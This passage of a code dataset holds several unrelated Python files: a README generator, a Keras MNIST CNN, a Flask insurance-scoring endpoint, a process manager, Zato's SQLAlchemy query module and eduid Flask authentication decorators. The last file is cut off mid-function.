code-block:: text\\n\\n'.format(text, '-' * len(text))\n\n\ndef main():\n commands = get_commands()\n\n header = open(path('README_header.rst'), 'r')\n readme = open_file('README.rst')\n\n # footer = open(path('README_footer.rst'), 'r')\n\n for line in header:\n readme.write(line)\n\n readme.write('\\n')\n for command in commands:\n print(command)\n _help = get_help(command)\n _help.wait()\n readme.write(heading(command))\n\n for line in _help.stdout:\n indented_line = ' ' + line.decode('utf-8')\n readme.write(indented_line)\n\n # for line in footer:\n # readme.write(line)\n\n readme.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"_generate_doc.py","file_name":"_generate_doc.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"640487918","text":"import numpy\nfrom keras.utils import np_utils\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom com.kailin.api_image import api_image\nfrom com.kailin.api_file import api_file\n\nnumpy.random.seed(10)\n\n(train_image, train_label), (test_image, test_label) = mnist.load_data()\n\n# train_image_hot = train_image.reshape(60000, 784).astype('float32') / 255\n# test_image_hot = test_image.reshape(10000, 784).astype('float32') / 255\n\ntrain_image_hot = train_image.reshape(train_image.shape[0], 28, 28, 1).astype('float32') / 255\ntest_image_hot = test_image.reshape(test_image.shape[0], 28, 28, 1).astype('float32') / 255\n\ntrain_label_hot = np_utils.to_categorical(train_label)\ntest_label_hot = np_utils.to_categorical(test_label)\n\nmodel = Sequential()\nmodel.add(Conv2D(filters=16, kernel_size=(5, 5), padding='same', input_shape=(28, 28, 1), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(filters=36, kernel_size=(5, 5), padding='same', activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(units=512, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(units=128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(units=10, activation='softmax'))\n# default version\n# model.add(Dense(input_dim=784, units=1024, kernel_initializer='normal', activation='relu'))\n# model.add(Dropout(0.5))\n# model.add(Dense(units=512, kernel_initializer='normal', activation='relu'))\n# model.add(Dropout(0.5))\n# model.add(Dense(units=10, kernel_initializer='normal', activation='softmax'))\n\nprint(model.summary())\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n\n# try:\n# # model.load_weights('E:\\pythonwork\\data\\e06.h5')\n# api_file.loadMode(model,'E:\\pythonwork\\data\\e06.h5')\n# except:\nhistory = model.fit(x=train_image_hot, y=train_label_hot, validation_split=0.2, epochs=10, batch_size=300, verbose=2)\napi_image.showTrainHistory(history, 'acc', 'val_acc')\napi_image.showTrainHistory(history, 'loss', 'val_loss')\nscores = model.evaluate(test_image_hot, test_label_hot)\nprint('\\n', scores, '\\n')\n\nprediction = model.predict_classes(test_image_hot)\napi_image.showImageLabelPrediction(test_image, test_label, prediction, 0, 25)\napi_image.confusionMatrix(test_label, prediction)\n\napi_file.saveMode(model, 'E:\\pythonwork\\data\\e06.h5')\n# 
model.save_weights('E:\\pythonwork\\data\\e06.h5')\n","sub_path":"tensorflow/com/kailin/e06.py","file_name":"e06.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"130968287","text":"from flask import Flask, request, jsonify\r\nfrom flask_restful import Resource, Api\r\nfrom json import dumps\r\nimport datetime\r\n\r\nclass UserInsuranceOffers(Resource):\r\n def post(self):\r\n # define result structure with null values\r\n result = {\r\n 'auto': None,\r\n 'disability': None,\r\n 'home': None,\r\n 'life': None\r\n }\r\n\r\n # treating when receiving an empty body request\r\n if request.json != None:\r\n # get object user sent\r\n user = request.json\r\n # defining user`s base risk score\r\n base_score = 0\r\n for i in user['risk_questions']:\r\n base_score += i\r\n # set initial risk score for each user`s insurance line\r\n risk_score = {\r\n 'auto': base_score,\r\n 'disability': base_score,\r\n 'home': base_score,\r\n 'life': base_score\r\n } \r\n # get actual year for future comparison\r\n this_year = datetime.datetime.now().year\r\n\r\n if user['income'] == 0:\r\n result['disability'] = 'ineligible'\r\n if len(user['house']) == 0:\r\n result['home'] = 'ineligible' \r\n if len(user['vehicle']) == 0:\r\n result['auto'] = 'ineligible'\r\n\r\n if user['age'] > 60:\r\n result['disability'] = 'ineligible'\r\n result['life'] = 'ineligible'\r\n elif user['age'] < 30:\r\n risk_score['auto'] -= 2\r\n risk_score['disability'] -= 2\r\n risk_score['home'] -= 2\r\n risk_score['life'] -= 2\r\n elif user['age'] >= 30 and user['age'] <= 40:\r\n risk_score['auto'] -= 1\r\n risk_score['disability'] -= 1\r\n risk_score['home'] -= 1\r\n risk_score['life'] -= 1\r\n\r\n if user['income'] > 200000:\r\n risk_score['auto'] -= 1\r\n risk_score['disability'] -= 1\r\n risk_score['home'] -= 1\r\n risk_score['life'] -= 1\r\n\r\n if len(user['house']) > 0 and user['house']['ownership_status'] == 'mortgaged':\r\n risk_score['home'] += 1\r\n\r\n if user['dependents'] > 0:\r\n risk_score['disability'] += 1\r\n risk_score['life'] += 1\r\n\r\n if user['marital_status'] == 'married':\r\n risk_score['disability'] -= 1\r\n risk_score['life'] += 1\r\n\r\n if len(user['vehicle']) > 0 and this_year - user['vehicle']['year'] <= 5:\r\n risk_score['auto'] += 1\r\n\r\n # defining user`s final score\r\n for key in result:\r\n # only allow final score changing if insurance life wasn`t previously defined as ineligible for user\r\n if result[key] != 'ineligible':\r\n if risk_score[key] <= 0:\r\n result[key] = 'economic'\r\n elif risk_score[key] > 0 and risk_score[key] < 3:\r\n result[key] = 'regular'\r\n elif risk_score[key] >= 3:\r\n result[key] = 'responsible' \r\n \r\n return jsonify(result)\r\n","sub_path":"app/main/classes/user_insurance_offers.py","file_name":"user_insurance_offers.py","file_ext":"py","file_size_in_byte":3364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"93021957","text":"# -*- coding: utf-8 -*-\n\"\"\"\nWritten by Daniel M. 
Aukes and CONTRIBUTORS\nEmail: danaukesseas.harvard.edu.\nPlease see LICENSE for full license.\n\"\"\"\n\nfrom multiprocessing import Process\nfrom multiprocessing import Queue\nimport time\nimport random\nimport yaml\nimport os\n \n#def run_wrapper(a,b):\n# def wrap1(f):\n# print(a,b)\n# def wrapped_func(*args,**kwargs):\n# d = f(*args,**kwargs)\n# return d\n# return wrapped_func\n# return wrap1\n#\n#@run_wrapper('hey','babe')\n#def e(a,b,c):\n# print('inner',a,b,c)\n# return c\n \nclass DummyClass(object):\n def run(self): \n time.sleep(random.gauss(3,1))\n self.dummy = 'asdfsadfafds'\n\nclass ProcessDataWrapper(object):\n ii = 0\n def __init__(self,inner_process):\n self.index = ProcessDataWrapper.ii\n self.inner_process = inner_process\n ProcessDataWrapper.ii+=1\n def run_outer(self):\n self.time_started = time.time()\n self.inner_process.run()\n self.time_finished = time.time()\n self.time_elapsed = self.time_finished - self.time_started\n def save(self,folder):\n if not os.path.exists(folder):\n os.mkdir(folder)\n with open(os.path.normpath(os.path.join(folder,str(self.index)+'.dat')),'w') as f:\n yaml.dump(self,f)\n \nclass ProcessData(object):\n ii = 0\n def __init__(self):\n self.index = ProcessData.ii\n ProcessData.ii+=1\n def run_outer(self):\n self.time_started = time.time()\n self.run()\n self.time_finished = time.time()\n self.time_elapsed = self.time_finished - self.time_started\n def save(self,folder):\n with open(os.path.normpath(os.path.join(folder,str(self.index)+'.dat')),'w') as f:\n yaml.dump(self,f)\n \nclass DummyClass2(ProcessData):\n def run(self): \n time.sleep(random.gauss(3,1))\n self.dummy = 'asdfsadfafds'\n \nclass ProcessContainer(Process):\n def __init__(self,inner_process):\n Process.__init__(self)\n# self.process_data = ProcessDataWrapper(inner_process)\n self.process_data = inner_process\n def run(self):\n self.process_data.run_outer()\n self.queue.put(self.process_data)\n def set_queue(self,queue):\n self.queue = queue\n \nclass ProcessManager(object):\n sleep_time = .5\n def __init__(self,processes,max_processes=4,debug=True,block_till_finished = True,collect_all_data = True,save_data = False,save_dest = '.',refresh_display = None):\n self.all_processes = [ProcessContainer(p) for p in processes]\n self.processes = self.all_processes.copy()\n self.max_processes = max_processes\n self.debug = debug\n self.collect_all_data = collect_all_data\n if self.collect_all_data:\n self.data= []\n self.save_data = save_data\n self.save_dest = save_dest\n self.block_till_finished = block_till_finished\n self.running = []\n self.done = []\n self.num_processes = len(self.processes)\n self.queue=Queue()\n self.checkalivedead()\n if refresh_display!=None:\n self.refresh_display = refresh_display\n \n def run(self):\n self.time_launched = time.time()\n self.print_debug('launching processes') \n while not not self.processes:\n if self.num_running < self.max_processes:\n num_can_start = self.max_processes - self.num_running \n num_remaining = len(self.processes)\n num_to_start = min(num_can_start,num_remaining)\n new_processes = []\n for ii in range(num_to_start):\n p = self.processes.pop(0)\n new_processes.append(p)\n p.set_queue(self.queue)\n p.start()\n self.running.append(p)\n# for p in new_processes:\n# p.join()\n string = '{0:0.0f} slots, {1:0.0f} remaining, {2:0.0f} started'.format(num_can_start,num_remaining,num_to_start)\n self.print_debug(string)\n self.checkalivedead()\n self.pull_queue()\n time.sleep(self.sleep_time)\n# for processss in self.all_processes:\n# 
proce.join()\n\n if self.block_till_finished:\n self.print_debug('waiting to clear')\n while not not self.running:\n self.checkalivedead()\n self.pull_queue()\n time.sleep(self.sleep_time)\n\n def checkalivedead(self):\n running = []\n new_done = False\n for process in self.running:\n if process.is_alive():\n running.append(process)\n else:\n self.done.append(process)\n new_done = True\n \n self.running = running\n self.num_running = len(self.running)\n self.num_done= len(self.done)\n if self.debug:\n if new_done:\n time_current = time.time()\n time_elapsed = time_current - self.time_launched\n time_remaining = (time_current-self.time_launched)/self.num_done*self.num_processes\n self.print_debug('{0:.2f} minutes elapsed/{1:.2f} minutes total, {2:d}/{3} finished'.format(time_elapsed/60,time_remaining/60,self.num_done,self.num_processes))\n\n def pull_queue(self):\n newitems = []\n while not self.queue.empty():\n item = self.queue.get()\n if self.collect_all_data:\n self.data.append(item)\n if self.save_data:\n item.save(self.save_dest)\n newitems.append(item)\n try:\n self.refresh_display(newitems)\n except AttributeError:\n pass\n \n def print_debug(self,*args,**kwargs):\n if self.debug:\n print(args,kwargs)\n\n\nif __name__ == '__main__':\n t0 = time.time()\n processes = [DummyClass2() for index in range(20)]\n pm = ProcessManager(processes,max_processes=10,debug=True,block_till_finished = True,collect_all_data = False,save_data = True,save_dest = './data')\n pm.run()\n \n t1 = time.time()\n print('elapsed time: ',t1-t0)\n","sub_path":"dev_tools/process_manager.py","file_name":"process_manager.py","file_ext":"py","file_size_in_byte":6271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"44208307","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright (C) 2011 Dariusz Suchojad \n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. 
If not, see <http://www.gnu.org/licenses/>.\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n# SQLAlchemy\nfrom sqlalchemy.sql.expression import case, literal_column\n\n# Zato\nfrom zato.common.odb.model import (ChannelAMQP, ChannelWMQ, ChannelZMQ, Cluster, \n    ConnDefAMQP, ConnDefWMQ, CronStyleJob, HTTPBasicAuth, HTTPSOAP, HTTPSOAPSecurity, \n    IntervalBasedJob, Job, OutgoingAMQP, OutgoingFTP, OutgoingS3, OutgoingWMQ, OutgoingZMQ, \n    SecurityDefinition, Service, TechnicalAccount, WSSDefinition)\n\n# ##############################################################################\n\ndef internal_channel_list(session, cluster_id):\n    \"\"\" All the HTTP/SOAP channels that point to internal services.\n    \"\"\"\n    return session.query(HTTPSOAP.soap_action, Service.name).\\\n        filter(HTTPSOAP.cluster_id==Cluster.id).\\\n        filter(HTTPSOAP.service_id==Service.id).\\\n        filter(Service.is_internal==True).\\\n        filter(Cluster.id==cluster_id)\n\n# ##############################################################################\n\ndef job_list(session, cluster_id):\n    \"\"\" All the scheduler's jobs defined in the ODB.\n    \"\"\"\n    return session.query(Job.id, Job.name, Job.is_active,\n        Job.job_type, Job.start_date, Job.extra,\n        Service.name.label('service_name'), Service.id.label('service_id'),\n        IntervalBasedJob.weeks, IntervalBasedJob.days,\n        IntervalBasedJob.hours, IntervalBasedJob.minutes,\n        IntervalBasedJob.seconds, IntervalBasedJob.repeats,\n        CronStyleJob.cron_definition).\\\n        outerjoin(IntervalBasedJob, Job.id==IntervalBasedJob.job_id).\\\n        outerjoin(CronStyleJob, Job.id==CronStyleJob.job_id).\\\n        filter(Cluster.id==cluster_id).\\\n        filter(Job.service_id==Service.id).\\\n        order_by('job.name').\\\n        all()\n\n# ##############################################################################\n\ndef basic_auth_list(session, cluster_id):\n    \"\"\" All the HTTP Basic Auth definitions.\n    \"\"\"\n    return session.query(HTTPBasicAuth).\\\n        filter(Cluster.id==cluster_id).\\\n        order_by('http_basic_auth_def.name').\\\n        all()\n\ndef tech_acc_list(session, cluster_id):\n    \"\"\" All the technical accounts.\n    \"\"\"\n    return session.query(TechnicalAccount).\\\n        order_by(TechnicalAccount.name).\\\n        filter(Cluster.id==cluster_id).\\\n        all()\n\ndef wss_list(session, cluster_id):\n    \"\"\" All the WS-Security definitions.\n    \"\"\"\n    return session.query(WSSDefinition).\\\n        filter(Cluster.id==cluster_id).\\\n        order_by('wss_def.name').\\\n        all()\n\n# ##############################################################################\n\ndef _def_amqp(session, cluster_id):\n    return session.query(ConnDefAMQP.name, ConnDefAMQP.id, ConnDefAMQP.host,\n        ConnDefAMQP.port, ConnDefAMQP.vhost, ConnDefAMQP.username,\n        ConnDefAMQP.frame_max, ConnDefAMQP.heartbeat, ConnDefAMQP.password).\\\n        filter(Cluster.id==ConnDefAMQP.cluster_id).\\\n        filter(ConnDefAMQP.def_type=='amqp').\\\n        filter(Cluster.id==cluster_id).\\\n        order_by(ConnDefAMQP.name)\n\ndef def_amqp(session, cluster_id, id):\n    \"\"\" A particular AMQP definition\n    \"\"\"\n    return _def_amqp(session, cluster_id).\\\n        filter(ConnDefAMQP.id==id).\\\n        one()\n\ndef def_amqp_list(session, cluster_id):\n    \"\"\" AMQP connection definitions.\n    \"\"\"\n    return _def_amqp(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _def_jms_wmq(session, cluster_id):\n    return session.query(ConnDefWMQ.id, ConnDefWMQ.name, ConnDefWMQ.host,\n        ConnDefWMQ.port, ConnDefWMQ.queue_manager, ConnDefWMQ.channel,\n        ConnDefWMQ.cache_open_send_queues, 
ConnDefWMQ.cache_open_receive_queues,\n ConnDefWMQ.use_shared_connections, ConnDefWMQ.ssl, ConnDefWMQ.ssl_cipher_spec,\n ConnDefWMQ.ssl_key_repository, ConnDefWMQ.needs_mcd, ConnDefWMQ.max_chars_printed).\\\n filter(Cluster.id==ConnDefWMQ.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(ConnDefWMQ.name)\n\ndef def_jms_wmq(session, cluster_id, id):\n \"\"\" A particular JMS WebSphere MQ definition\n \"\"\"\n return _def_jms_wmq(session, cluster_id).\\\n filter(ConnDefWMQ.id==id).\\\n one()\n\ndef def_jms_wmq_list(session, cluster_id):\n \"\"\" JMS WebSphere MQ connection definitions.\n \"\"\"\n return _def_jms_wmq(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _out_amqp(session, cluster_id):\n return session.query(OutgoingAMQP.id, OutgoingAMQP.name, OutgoingAMQP.is_active,\n OutgoingAMQP.delivery_mode, OutgoingAMQP.priority, OutgoingAMQP.content_type,\n OutgoingAMQP.content_encoding, OutgoingAMQP.expiration, OutgoingAMQP.user_id,\n OutgoingAMQP.app_id, ConnDefAMQP.name.label('def_name'), OutgoingAMQP.def_id).\\\n filter(OutgoingAMQP.def_id==ConnDefAMQP.id).\\\n filter(ConnDefAMQP.id==OutgoingAMQP.def_id).\\\n filter(Cluster.id==ConnDefAMQP.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(OutgoingAMQP.name)\n\ndef out_amqp(session, cluster_id, id):\n \"\"\" An outgoing AMQP connection.\n \"\"\"\n return _out_amqp(session, cluster_id).\\\n filter(OutgoingAMQP.id==id).\\\n one()\n\ndef out_amqp_list(session, cluster_id):\n \"\"\" Outgoing AMQP connections.\n \"\"\"\n return _out_amqp(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _out_jms_wmq(session, cluster_id):\n return session.query(OutgoingWMQ.id, OutgoingWMQ.name, OutgoingWMQ.is_active,\n OutgoingWMQ.delivery_mode, OutgoingWMQ.priority, OutgoingWMQ.expiration,\n ConnDefWMQ.name.label('def_name'), OutgoingWMQ.def_id).\\\n filter(OutgoingWMQ.def_id==ConnDefWMQ.id).\\\n filter(ConnDefWMQ.id==OutgoingWMQ.def_id).\\\n filter(Cluster.id==ConnDefWMQ.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(OutgoingWMQ.name)\n\ndef out_jms_wmq(session, cluster_id, id):\n \"\"\" An outgoing JMS WebSphere MQ connection.\n \"\"\"\n return _out_jms_wmq(session, cluster_id).\\\n filter(OutgoingWMQ.id==id).\\\n one()\n\ndef out_jms_wmq_list(session, cluster_id):\n \"\"\" Outgoing JMS WebSphere MQ connections.\n \"\"\"\n return _out_jms_wmq(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _channel_amqp(session, cluster_id):\n return session.query(ChannelAMQP.id, ChannelAMQP.name, ChannelAMQP.is_active,\n ChannelAMQP.queue, ChannelAMQP.consumer_tag_prefix,\n ConnDefAMQP.name.label('def_name'), ChannelAMQP.def_id,\n Service.name.label('service_name')).\\\n filter(ChannelAMQP.def_id==ConnDefAMQP.id).\\\n filter(ChannelAMQP.service_id==Service.id).\\\n filter(Cluster.id==ConnDefAMQP.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(ChannelAMQP.name)\n\ndef channel_amqp(session, cluster_id, id):\n \"\"\" A particular AMQP channel.\n \"\"\"\n return _channel_amqp(session, cluster_id).\\\n filter(ChannelAMQP.id==id).\\\n one()\n\ndef channel_amqp_list(session, cluster_id):\n \"\"\" AMQP channels.\n \"\"\"\n return _channel_amqp(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _channel_jms_wmq(session, cluster_id):\n return 
session.query(ChannelWMQ.id, ChannelWMQ.name, ChannelWMQ.is_active,\n ChannelWMQ.queue, ConnDefWMQ.name.label('def_name'), ChannelWMQ.def_id,\n Service.name.label('service_name')).\\\n filter(ChannelWMQ.def_id==ConnDefWMQ.id).\\\n filter(ChannelWMQ.service_id==Service.id).\\\n filter(Cluster.id==ConnDefWMQ.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(ChannelWMQ.name)\n\ndef channel_jms_wmq(session, cluster_id, id):\n \"\"\" A particular JMS WebSphere MQ channel.\n \"\"\"\n return _channel_jms_wmq(session, cluster_id).\\\n filter(ChannelWMQ.id==id).\\\n one()\n\ndef channel_jms_wmq_list(session, cluster_id):\n \"\"\" JMS WebSphere MQ channels.\n \"\"\"\n return _channel_jms_wmq(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _out_zmq(session, cluster_id):\n return session.query(OutgoingZMQ.id, OutgoingZMQ.name, OutgoingZMQ.is_active,\n OutgoingZMQ.address, OutgoingZMQ.socket_type).\\\n filter(Cluster.id==OutgoingZMQ.cluster_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(OutgoingZMQ.name)\n\ndef out_zmq(session, cluster_id, id):\n \"\"\" An outgoing ZeroMQ connection.\n \"\"\"\n return _out_zmq(session, cluster_id).\\\n filter(OutgoingZMQ.id==id).\\\n one()\n\ndef out_zmq_list(session, cluster_id):\n \"\"\" Outgoing ZeroMQ connections.\n \"\"\"\n return _out_zmq(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _channel_zmq(session, cluster_id):\n return session.query(ChannelZMQ.id, ChannelZMQ.name, ChannelZMQ.is_active,\n ChannelZMQ.address, ChannelZMQ.socket_type, ChannelZMQ.sub_key, \n Service.name.label('service_name')).\\\n filter(Cluster.id==ChannelZMQ.cluster_id).\\\n filter(Service.id==ChannelZMQ.service_id).\\\n filter(Cluster.id==cluster_id).\\\n order_by(ChannelZMQ.name)\n\ndef channel_zmq(session, cluster_id, id):\n \"\"\" An incoming ZeroMQ connection.\n \"\"\"\n return _channel_zmq(session, cluster_id).\\\n filter(ChannelZMQ.id==id).\\\n one()\n\ndef channel_zmq_list(session, cluster_id):\n \"\"\" Incoming ZeroMQ connections.\n \"\"\"\n return _channel_zmq(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _http_soap(session, cluster_id):\n\n tech_acc_case_id = (SecurityDefinition.security_def_type=='tech_acc', \n literal_column('(select tech_account.id from tech_account where tech_account.security_def_id = security_def.id)'))\n tech_acc_case_name = (SecurityDefinition.security_def_type=='tech_acc', \n literal_column('(select tech_account.name from tech_account where tech_account.security_def_id = security_def.id)'))\n \n wss_case_id = (SecurityDefinition.security_def_type=='wss_username_password', \n literal_column('(select wss_def.id from wss_def where wss_def.security_def_id = security_def.id)'))\n wss_case_name = (SecurityDefinition.security_def_type=='wss_username_password', \n literal_column('(select wss_def.name from wss_def where wss_def.security_def_id = security_def.id)'))\n \n basic_auth_case_id = (SecurityDefinition.security_def_type=='basic_auth', \n literal_column('(select http_basic_auth_def.id from http_basic_auth_def where http_basic_auth_def.security_def_id = security_def.id)'))\n basic_auth_case_name = (SecurityDefinition.security_def_type=='basic_auth', \n literal_column('(select http_basic_auth_def.name from http_basic_auth_def where http_basic_auth_def.security_def_id = security_def.id)'))\n \n return session.query(HTTPSOAP.id, 
HTTPSOAP.name, HTTPSOAP.is_active, \n        HTTPSOAP.is_internal, HTTPSOAP.transport, HTTPSOAP.url_path, \n        HTTPSOAP.method, HTTPSOAP.soap_action, HTTPSOAP.soap_version, \n        Service.id.label('service_id'),\n        Service.name.label('service_name'),\n        Service.impl_name,\n        SecurityDefinition.id.label('security_def_id'),\n        SecurityDefinition.security_def_type,\n        case([tech_acc_case_id, wss_case_id, basic_auth_case_id]).label('security_id'),\n        case([tech_acc_case_name, wss_case_name, basic_auth_case_name]).label('security_name'),\n        ).\\\n        outerjoin(HTTPSOAPSecurity, HTTPSOAPSecurity.http_soap_id==HTTPSOAP.id).\\\n        outerjoin(SecurityDefinition, HTTPSOAPSecurity.security_def_id==SecurityDefinition.id).\\\n        filter(Cluster.id==HTTPSOAP.cluster_id).\\\n        filter(Service.id==HTTPSOAP.service_id).\\\n        filter(Cluster.id==cluster_id).\\\n        order_by(HTTPSOAP.name)\n\n# No point in creating a new function if we can alias an already existing one.\nhttp_soap_security_list = _http_soap\n\ndef http_soap(session, cluster_id, id):\n    \"\"\" An HTTP/SOAP connection.\n    \"\"\"\n    return _http_soap(session, cluster_id).\\\n        filter(HTTPSOAP.id==id).\\\n        one()\n\ndef http_soap_list(session, cluster_id, connection=None, transport=None):\n    \"\"\" HTTP/SOAP connections.\n    \"\"\"\n    q = _http_soap(session, cluster_id)\n    \n    if connection:\n        q = q.filter(HTTPSOAP.connection==connection)\n        \n    if transport:\n        q = q.filter(HTTPSOAP.transport==transport)\n        \n    return q.all()\n\n# ##############################################################################\n\ndef _out_s3(session, cluster_id):\n    return session.query(OutgoingS3.id, OutgoingS3.name, OutgoingS3.is_active,\n        OutgoingS3.prefix, OutgoingS3.separator,\n        OutgoingS3.key_sync_timeout).\\\n        filter(Cluster.id==OutgoingS3.cluster_id).\\\n        filter(Cluster.id==cluster_id).\\\n        order_by(OutgoingS3.name)\n\ndef out_s3(session, cluster_id, id):\n    \"\"\" An outgoing S3 connection.\n    \"\"\"\n    return _out_s3(session, cluster_id).\\\n        filter(OutgoingS3.id==id).\\\n        one()\n\ndef out_s3_list(session, cluster_id):\n    \"\"\" Outgoing S3 connections.\n    \"\"\"\n    return _out_s3(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _out_ftp(session, cluster_id):\n    return session.query(OutgoingFTP.id, OutgoingFTP.name, OutgoingFTP.is_active,\n        OutgoingFTP.host, OutgoingFTP.port, OutgoingFTP.user, OutgoingFTP.password, \n        OutgoingFTP.acct, OutgoingFTP.timeout, OutgoingFTP.dircache).\\\n        filter(Cluster.id==OutgoingFTP.cluster_id).\\\n        filter(Cluster.id==cluster_id).\\\n        order_by(OutgoingFTP.name)\n\ndef out_ftp(session, cluster_id, id):\n    \"\"\" An outgoing FTP connection.\n    \"\"\"\n    return _out_ftp(session, cluster_id).\\\n        filter(OutgoingFTP.id==id).\\\n        one()\n\ndef out_ftp_list(session, cluster_id):\n    \"\"\" Outgoing FTP connections.\n    \"\"\"\n    return _out_ftp(session, cluster_id).all()\n\n# ##############################################################################\n\ndef _service(session, cluster_id):\n    return session.query(Service.id, Service.name, Service.is_active,\n        Service.impl_name, Service.is_internal).\\\n        filter(Cluster.id==Service.cluster_id).\\\n        filter(Cluster.id==cluster_id).\\\n        order_by(Service.name)\n\ndef service(session, cluster_id, id):\n    \"\"\" A service.\n    \"\"\"\n    return _service(session, cluster_id).\\\n        filter(Service.id==id).\\\n        one()\n\ndef service_list(session, cluster_id):\n    \"\"\" All services.\n    \"\"\"\n    return _service(session, cluster_id).all()\n\n# 
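##############################################################################\n\n# Editor's note (usage sketch, not part of the original module): every\n# connection type above follows the same pattern -- a private _foo(session,\n# cluster_id) builder that returns a SQLAlchemy query, plus foo() / foo_list()\n# wrappers that finish it with .one() or .all(). Assuming a configured session\n# and hypothetical IDs:\n#\n#     conn = out_s3(session, 1, 42)          # exactly one row, else an error\n#     for item in out_s3_list(session, 1):   # every outgoing S3 connection\n#         print(item.name, item.is_active)\n\n# 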
##############################################################################\n","sub_path":"code/zato-common/src/zato/common/odb/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":15841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"241840598","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\n\nimport inspect\nimport warnings\nfrom functools import wraps\n\nfrom flask import abort, jsonify, request\nfrom marshmallow.exceptions import ValidationError\nfrom six import string_types\nfrom werkzeug.wrappers import Response as WerkzeugResponse\n\nfrom eduid_common.api.messages import FluxData, error_response\nfrom eduid_common.api.schemas.models import FluxFailResponse, FluxResponseStatus, FluxSuccessResponse\nfrom eduid_common.api.utils import get_user\nfrom eduid_common.session import session\n\n__author__ = 'lundberg'\n\n\ndef require_eppn(f):\n @wraps(f)\n def require_eppn_decorator(*args, **kwargs):\n eppn = session.get('user_eppn', None)\n # If the user is logged in and has a session\n # pass on the request to the decorated view\n # together with the eppn of the logged in user.\n if eppn:\n kwargs['eppn'] = eppn\n return f(*args, **kwargs)\n abort(401)\n\n return require_eppn_decorator\n\n\ndef require_user(f):\n @wraps(f)\n def require_user_decorator(*args, **kwargs):\n user = get_user()\n kwargs['user'] = user\n return f(*args, **kwargs)\n\n return require_user_decorator\n\n\ndef can_verify_identity(f):\n @wraps(f)\n def verify_identity_decorator(*args, **kwargs):\n user = get_user()\n # For now a user can just have one verified NIN\n if user.nins.primary is not None:\n # TODO: Make this a CommonMsg I guess\n return error_response(message='User is already verified')\n # A user can not verify a nin if another previously was verified\n locked_nin = user.locked_identity.find('nin')\n if locked_nin and locked_nin.number != kwargs['nin']:\n # TODO: Make this a CommonMsg I guess\n return error_response(message='Another nin is already registered for this user')\n\n return f(*args, **kwargs)\n\n return verify_identity_decorator\n\n\nclass MarshalWith(object):\n \"\"\"\n Decorator to format the data returned from a Flask view and ensure it conforms to a marshmallow schema.\n\n A common usage is to use this to format the response as a Flux Standard Action\n (https://github.com/redux-utilities/flux-standard-action) by using a schema that has FluxStandardAction\n as superclass, or as a mixin.\n\n See the documentation of the FluxResponse class, or the link above, for more information about the\n on-the-wire format of these Flux Standard Actions.\n \"\"\"\n\n def __init__(self, schema):\n self.schema = schema\n\n def __call__(self, f):\n @wraps(f)\n def marshal_decorator(*args, **kwargs):\n # Call the Flask view, which is expected to return a FluxData instance,\n # or in special cases an WerkzeugResponse (e.g. 
when a redirect is performed).\n ret = f(*args, **kwargs)\n\n if isinstance(ret, WerkzeugResponse):\n # No need to Marshal again, someone else already did that\n return ret\n\n if isinstance(ret, dict):\n # TODO: Backwards compatibility mode - work on removing the need for this\n ret = FluxData(FluxResponseStatus.OK, payload=ret)\n\n if not isinstance(ret, FluxData):\n raise TypeError('Data returned from Flask view was not a FluxData (or WerkzeugResponse) instance')\n\n if ret.status != FluxResponseStatus.OK:\n _flux_response = FluxFailResponse(request, payload=ret.payload)\n else:\n _flux_response = FluxSuccessResponse(request, payload=ret.payload)\n return jsonify(self.schema().dump(_flux_response.to_dict()))\n\n return marshal_decorator\n\n\nclass UnmarshalWith(object):\n def __init__(self, schema):\n self.schema = schema\n\n def __call__(self, f):\n @wraps(f)\n def unmarshal_decorator(*args, **kwargs):\n try:\n json_data = request.get_json()\n if json_data is None:\n json_data = {}\n unmarshal_result = self.schema().load(json_data)\n kwargs.update(unmarshal_result)\n return f(*args, **kwargs)\n except ValidationError as e:\n response_data = FluxFailResponse(\n request, payload={'error': e.normalized_messages(), 'csrf_token': session.get_csrf_token()}\n )\n return 